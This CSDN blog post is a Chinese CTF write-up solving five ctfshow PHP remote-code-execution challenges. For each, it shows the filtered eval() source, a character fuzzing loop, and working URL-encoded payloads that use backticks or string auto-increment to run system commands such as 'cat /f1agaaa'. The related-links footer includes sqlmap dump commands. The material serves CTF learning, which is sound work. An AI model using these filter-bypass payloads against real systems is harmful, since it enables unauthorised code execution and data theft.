ctfshow--RCE极限挑战

最新推荐文章于 2024-02-25 18:35:19 发布
最新推荐文章于 2024-02-25 18:35:19 发布
阅读量1.6k 收藏 7
点赞数 4
分类专栏: CTF 文章标签: php 网络安全 CTF 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bossDDYY/article/details/127954538
版权

本周ctfshow的挑战注重点为RCE,主要利用是:自增绕过RCE

RCE挑战1

属于简单类型

源码

error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
$code = str_replace("(","括号",$code);
$code = str_replace(".","点",$code);
eval($code);

发现过滤了(.,我们可以利用反引号执行命令 echo输出

code=echo `ls /`;

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sxlrpVYo-1668950575883)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221118145758514.png)]

输出flag

code=echo `cat /f1agaaa`;

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6qVbdFFU-1668950575884)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221118145815342.png)]

RCE挑战2

比较简单的

打开题目 审计源码

error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow)) {
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}

我们跑一下 看看哪些字符没有被过滤

<?php
for ($i=32;$i<127;$i++){
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
            echo chr($i)." ";
        }
}

结果:

  ! $ ' ( ) + , . / ; = [ ] _

可以考虑$_绕过!(自增绕过)

编写

$_=[]._;$__=$_['!'=='='];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_='_'.$___;($$_[_])($$_[__]);
//相当于 ($_GET[_])($_GET[__])  使用的时候url编码一下

传入

?_=system&__=ls

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZTt2a0Ps-1668950575885)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221118161938354.png)]

找flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VisaQcTH-1668950575885)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221118162003296.png)]

POST:
ctf_show=%24_%3D%5B%5D._%3B%24__%3D%24_%5B'!'%3D%3D'%3D'%5D%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___%3D%2B%2B%24__%3B%2B%2B%24__%3B%24___%3D%2B%2B%24__.%24___%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24___%3D%24___.%2B%2B%24__%3B%24_%3D'_'.%24___%3B(%24%24_%5B_%5D)(%24%24_%5B__%5D)%3B

GET:
?_=system&__=cat /f*

RCE挑战3

限制字符的自增 对于我来说较难

源码

//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 105) {
        if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}

fuzz测试什么没有被过滤

for ($i=32;$i<127;$i++){
    if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
        echo chr($i);
    }
}

输出

 $()+,./01;=[]_

要保证构造payload长度小于105而且还是自增rce

使用A的话构造GET肯定是无法小于105 那么可以尝试构造POST _/_ == NAN

构造的payload

$_=(_/_._)[0];$_0=++$_;$_0=++$_.$_0;++$_;++$_;$_0.=++$_;$_0.=++$_;$_=_.$_0;($$_[0])($$_[1]);

传入参数

POST:
ctf_show=%24_%3D(_%2F_._)%5B0%5D%3B%24_0%3D%2B%2B%24_%3B%24_0%3D%2B%2B%24_.%24_0%3B%2B%2B%24_%3B%2B%2B%24_%3B%24_0.%3D%2B%2B%24_%3B%24_0.%3D%2B%2B%24_%3B%24_%3D_.%24_0%3B(%24%24_%5B0%5D)(%24%24_%5B1%5D)%3B&0=system&1=cat /f1agaaa

RCE挑战4

源码

<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 84) {
        if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}

要求字符小于等于84

fuzz测试,可用字符

 $()+,./0;=[]_
  $()+,./;=[]_

构造

$_=(_/_._)[0];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;$$_[_]($$_[0]);
// 分析一下
//1.(_/_._)[0]==N
//$__=$_.$_++; 此时的$_=O $_.$_++; 这个顺序是(实验得出来的):
	// 先使用 后自增 最后使用 $__=$_.O; -> $_++ -> $__=P.O;

payload

ctf_show=%24_%3D(_%2F_._)%5B0%5D%3B%2B%2B%24_%3B%24__%3D%24_.%24_%2B%2B%3B%2B%2B%24_%3B%2B%2B%24_%3B%2B%2B%24_%3B%24__.%3D%24_%2B%2B.%24_%3B%24_%3D_.%24__%3B%24%24_%5B_%5D(%24%24_%5B0%5D)%3B&_=system&0=nl /f1agaaa

RCE挑战5

源码

highlight_file(__FILE__);
if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 73) {
        if (!preg_match("/[a-zA-Z0-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}

限制传入的参数长度小于等于73

fuzz测试哪些字符没有被过滤

for ($i=32;$i<127;$i++){
    if (!preg_match("/[a-zA-Z0-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){
        echo chr($i);
    }
}

//  $()+,./;=[]_

构造payload

# 第一种  !!知识点!! 直接使用_POST当做参数
$_=(_/_._)[_];$_++;$__=$_.$_++;++$_;++$_;$$_[$_=_.$__.++$_.++$_]($$_[_]);
第一个参数:_POST 第二个参数:_
    # 借助ctfshow群里佬的payload tql

# 第二种
# 不可见字符替换  !!知识点!!
$_=(_/_._)[_];++$_;$a=$_.$_++;++$_;++$_;$_=_.$a.++$_.++$_;$$_[_]($$_[a]);
# 转为url后将a改为 %ff $fe 等不可见字符
ctf_show=$%ff=_(%ff/%ff)[%ff];$_=%2b%2b$%ff;$_=_.%2b%2b$%ff.$_;$%ff%2b%2b;$%ff%2b%2b;$_.=%2b%2b$%ff.%2b%2b$%ff;$$_[_]($$_[%ff]);&_=system&%ff=cat /f1agaaa

另外更有大佬的payload

phpinfo安装了一个扩展gettext,该扩展支持函数_() ,相当于gettext(),直接转化为字符串

<?php
$a=_(a/a)[a];//相当于gettext(0/0)[0],得到N
$_=++$a;//O
$_=_.++$a.$_;//_PO
$a++;$a++;//R
$_.=++$a.++$a;//_POST
$$_[a]($$_[_]);//$_POST[a]($_POST[_])
yb0os1
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFSHOW web76 数据库读文件RCE
lonmar的博客
11-26 383
利用glob://绕过open_basedir限制读取目录 再利用MySQL函数读取文件 利用条件是知道数据库名称,密码等等 可能数据库信息泄露的时候可以用这个 try { $dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root'); foreach($dbh->query('select load_file("/flag36d.txt")') as $row) { echo
x微E-Cology WorkflowServiceXml RCE1
08-03
x微E-Cology WorkflowServiceXml RCEx 微 E-Cology WorkflowServiceXml RCEx 微 E-Cology
ctfshow每周大挑战RCE极限挑战
XiaoXiao_RenHe的专栏
04-10 1158
ctfshow RCE 极限挑战解析,反引号执行系统命令、数组自增传参、_/_非数字NAN自增传参、url编码。
CTFSHOW_RCE极限挑战
v2ish1yan的博客
11-20 979
CTFSHOW的rce极限挑战
CTF特训(一):ctfshow-RCE挑战
LCW991207的博客
12-27 1585
因为不可见字符的原因,所以要用bp来做,hackbar可能会和我一样出现 url malformed CLOSE,用bp做的时候注意+会被替换成空格所以要编码外,还有用不可见字符替换过滤得字母(为了使得字符数更短才用的),其他直接post提交即可。注意这里有字数限制,可以用数字0或者1,那么就可以通过(0/0)来构造float型的NAN,(1/0)来构造float型的INF,然后转换成字符串型,得到"NAN"和"INF"中的字符了。这意味着,如果在后面的代码中发生任何错误,用户将不会看到任何错误消息。
CTFshow-RCE极限挑战
qq_63928796的博客
11-21 2032
ctfshow出的这五道rce感觉挺好玩的,但自己没做出几道来,所以来详细的复现一下,这几道题基本都是利用的自增,但长度逐渐缩短,雀氏极限
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 ...
CVE-2021-34473 Exchange RCE.MD
04-23
CVE-2021-34473 Exchange RCE
CVE-2021-26855 Exchange RCE.MD
04-23
CVE-2021-26855 Exchange RCE
CTFSHOW每周大挑战——RCE
qq_61955196的博客
11-21 2676
ctfshow的每周大挑战RCE的解题方法和一些问题的解决方法和个人总结。
ctfshow RCE极限挑战 wp
m0_64815693的博客
11-20 3641
ctfshow rce极限挑战 1-5 wp
ctfshow 每周大挑战 RCE极限挑战3
Altering_Ji的博客
05-29 392
ctfshow 每周大挑战 RCE极限挑战3 payload有长度限制105,通过变量自增构造出POST,实现RCE
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 3857
ctfshow 每周大挑战 极限命令执行 wp
ctfshow RCE极限挑战刷题
最新发布
hcja666的博客
02-25 520
比上题限制更多,长度是84以下,数字只能用0,本题和上题一样,bp传没用(反正我是这样),hackbar反而有用。【Web】无字母/数字/参RCE相关例题wp-----------csdn Z3r4y。没思路了,看了下某大佬的参考,第一次写自增绕过。还是自增绕过,payload长度做了限制。最后tac /f*即可。直接echo加反引号,先ls再tac。将长度限制到了73,数字0也不可以用了。自己在php里面写好,然后去掉换行。不是很会极限,还是参考官方答案吧。有个脚本可以看看能传哪些字符。
CTFshow-RCE极限挑战wp
Leaf_initial的博客
04-10 419
开始限制长度了,105字符,但是可以用数字0或者1,那么就可以通过(0/0)来构造float型的NAN,(1/0)来构造float型的INF,然后转换成字符串型,得到"NAN"和"INF"中的字符了,payload构造过程,这里直觉上认为构造。以及类似的东西都是变量名称,在构造payload的过程就就是起到一个变量名的作用,类似于$a、$b,在然后在php中,如果强制连接数组和字符串的话,数组将被转换成字符串,例如在下列代码中。于是利用这一点,我们可以得出Array中的第一个字母A,然后利用自增来得到。
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
Jay17的博客
08-16 3020
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全
ctfshow sql
08-03
回答: 要在ctfshow数据库中执行SQL查询和获取数据,可以使用sqlmap工具。首先,使用以下命令查询ctfshow_user表的列名:python ./sqlmap.py -u "http://ef1aabd2-a275-40df-8ad4-99e7563322f8.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --columns。[1]接下来,使用以下命令来查询和获取ctfshow_user表中的数据:python ./sqlmap.py -u "http://ef1aabd2-a275-40df-8ad4-99e7563322f8.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump。[2]如果你只想直接获取最后一步的数据,可以使用以下命令:python sqlmap.py -u "http://b794446b-7f11-4600-beba-3de5961369b7.challenge.ctf.show/api/" --data="id=1" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump。[3]这些命令将帮助你在ctfshow数据库中执行SQL查询和获取数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值